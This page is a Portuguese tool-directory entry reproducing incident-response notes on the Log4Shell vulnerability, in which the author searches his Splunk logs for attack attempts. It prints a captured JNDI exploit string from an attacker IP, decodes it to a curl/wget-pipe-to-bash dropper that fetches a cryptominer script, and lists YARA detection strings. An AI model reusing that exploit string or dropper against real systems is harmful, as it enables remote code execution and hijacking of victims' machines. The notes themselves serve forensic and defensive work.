Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44228-DFIR-Notes — CVE-2021-44228 DFIR Notas | Kitploit
Ferramentas/GitHubGitHub/azeemering/cve-2021-44228-dfir-notes
Análise de VulnerabilidadesAnálise de MalwareForensia DigitalInteligência de AmeaçasAprendizado e EducaçãoResposta a IncidentesAnálise de Logs
GitHubazeemering/cve-2021-44228-dfir-notes

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-44228-DFIR-Notes

CVE-2021-44228 DFIR Notas

Ver Repositório
72há 4 anosAinda não revisado

CVE-2021-44228 DFIR-Notes

Dirigindo para casa, recebi minhas primeiras mensagens sobre a vulnerabilidade #log4shell.

Uma vulnerabilidade de alta gravidade (CVE-2021-44228) que impacta várias versões do utilitário Apache Log4j 2 foi divulgada publicamente no GitHub do projeto em 9 de dezembro de 2021. Essa vulnerabilidade, descoberta por Chen Zhaojun da Alibaba Cloud Security Team, afeta as versões 2.0 a 2.14.1 do Apache Log4j 2.

Mergulhei de cabeça quando cheguei em casa. Splunk4tw como sempre.

Após a publicação do primeiro proof-of-concept exploit no GitHub, agentes de ameaças começaram a escanear a Internet em busca de sistemas vulneráveis a essa falha de segurança explorável remotamente, que não requer autenticação. O que você verá abaixo são parte desses escaneamentos e tentativas de exploração.

Meu primeiro passo é verificar se alguém já publicou uma regra YARA inicial. Encontrei aqui https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b (Thx Florian Roth)

Ele menciona as seguintes strings de detecção: strings: $x1 = "${jndi:ldap:/" $x2 = "${jndi:rmi:/" $x3 = "${jndi:ldaps:/" $x4 = "${jndi:dns:/"

Não estou com medo... vamos abusar de algumas CPUs e ir direto ao ataque com a pior pesquisa do Splunk.

index=* jndi:ldap* (updated query with index=* "{lower:l}${lower:d}a${lower:p}")

Tenho alguns hits tanto nos meus logs do IIS quanto nos logs de eventos do Windows (redactados) e muitas tentativas bloqueadas nos logs do firewall....

IIS: image

WINEVENTLOG: image

Verificando o endereço IP 45.155.205.233.....São Petersburgo, Rússia.....que surpresa. image

A string encontrada parece uma string maliciosa ofuscada e codificada, clássica de manual. Vamos ver o que ela faz:

Vamos decodificar a string Base64 usando o cyberchef 2021-12-10 13:26:16 [redacted] GET / - 443 - xxx.xx.xxx.xx ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNDUuMzUuMTk1LjYzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE0NS4zNS4xOTUuNjM6ODApfGJhc2g=} http://[redacted]:80/ 200 0 0 171

image

(curl -s 45.155.xx.233:xxxx/145.xx.195.63:80||wget -q -O- 45.xx.205.233:xxxx/145.xx.xxx.63:80)|bash

Curl...executar um script shell, bash....OMG. Estou começando a ter uma ideia do que essa peça desagradável fará....

Vamos executar o comando curl em uma sandbox:

image

368 linhas de código. (execute aqui se quiser ver o script completo --> https://reqbin.com/c-ipejxywd

Alguns trechos:

image image image

E depois que termina, até limpa os arquivos de log...que surpresa:

image

Basicamente, tenta instalar um malware chamado Kingsin, que é um minerador de criptomoedas. Os alvos são sistemas nix. Certifique-se de corrigir seus sistemas, pois o exploit será usado para executar todo tipo de payloads provavelmente.

Agradecimentos aos meus colegas Martijn da Umbrio e Rob [redacted] por uma sexta-feira à noite de debates no WhatsApp sobre isso. 00:09 hora de dormir.

#UPDATES & bons Recursos#

  • https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
  • https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
  • https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228

image

Baixar ferramenta